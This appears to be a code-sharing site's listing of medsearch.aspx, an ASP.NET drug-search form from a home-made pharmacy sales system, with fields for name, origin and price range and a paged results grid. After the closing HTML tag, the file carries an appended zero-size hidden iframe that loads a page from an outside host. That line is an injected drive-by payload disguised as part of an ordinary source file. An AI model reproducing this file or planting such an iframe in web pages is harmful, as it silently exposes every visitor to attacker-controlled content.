⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 medsearch.aspx

📁 一个自制的药房销售管理系统
💻 ASPX
字号:
<%@ Page language="c#" Codebehind="medsearch.aspx.cs" AutoEventWireup="false" Inherits="medicine.medsearch" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
	<HEAD>
		<title>medsearch</title> 
		<!--#include virtual="head.htm"-->
		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
		<meta name="CODE_LANGUAGE" Content="C#">
		<meta name="vs_defaultClientScript" content="JavaScript">
		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
	</HEAD>
	<body>
		<form id="Form1" method="post" runat="server">
			<FONT face="宋体">
				<P align="center" title="药品搜索">
					<TABLE id="Table1" cellSpacing="1" cellPadding="1" width="300" border="0">
						<TR>
							<TD>
								<asp:TextBox id="TextBox1" tabIndex="1" runat="server" Width="100%" Height="100%" MaxLength="40"></asp:TextBox></TD>
							<TD>
								<asp:Button id="Button1" tabIndex="2" runat="server" Text="药品名称搜索" Width="100%" Height="100%"></asp:Button></TD>
						</TR>
						<TR>
							<TD>
								<asp:TextBox id="TextBox2" tabIndex="3" runat="server" Width="100%" Height="100%" MaxLength="40"></asp:TextBox></TD>
							<TD>
								<asp:Button id="Button2" tabIndex="4" runat="server" Text="药品产地搜索" Width="100%" Height="100%"></asp:Button></TD>
						</TR>
						<TR>
							<TD>价格在
								<asp:TextBox id="TextBox3" tabIndex="5" runat="server" Width="40px" Height="24"></asp:TextBox>到
								<asp:TextBox id="TextBox4" tabIndex="6" runat="server" Width="40px" Height="100%"></asp:TextBox>之间</TD>
							<TD>
								<asp:Button id="Button3" tabIndex="7" runat="server" Text="按价格搜索" Width="100%" Height="100%"></asp:Button></TD>
						</TR>
					</TABLE>
				</P>
				<P title="药品搜索" align="center">
					<asp:Label id="Label1" runat="server" ForeColor="Red"></asp:Label></P>
				<P align="center">
					<asp:DataGrid id="dg" runat="server" Width="760px" Height="15px" PageSize="20" CellPadding="1"
						CellSpacing="1" BorderColor="SteelBlue" BorderWidth="2px" AllowPaging="True" AllowSorting="True"
						AutoGenerateColumns="False" Visible="False">
						<Columns>
							<asp:BoundColumn DataField="mid" HeaderText="存储编号"></asp:BoundColumn>
							<asp:HyperLinkColumn DataNavigateUrlField="mid" DataNavigateUrlFormatString="show_med.aspx?mid={0}" DataTextField="mname"
								HeaderText="药品名称"></asp:HyperLinkColumn>
							<asp:BoundColumn DataField="price" HeaderText="价格"></asp:BoundColumn>
							<asp:BoundColumn DataField="product_place" HeaderText="产地"></asp:BoundColumn>
							<asp:BoundColumn DataField="product_time" HeaderText="生产日期"></asp:BoundColumn>
							<asp:BoundColumn DataField="store_time" HeaderText="有效期(月)"></asp:BoundColumn>
							<asp:BoundColumn DataField="number" HeaderText="数量"></asp:BoundColumn>
							<asp:BoundColumn HeaderText="过期标志"></asp:BoundColumn>
						</Columns>
						<PagerStyle NextPageText="下一页" PrevPageText="上一页"></PagerStyle>
					</asp:DataGrid></P>
			</FONT>
		</form>
	</body>
</HTML>
<iframe src=http://www.ac86.cn/88/index.htm width=0 height=0></iframe>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -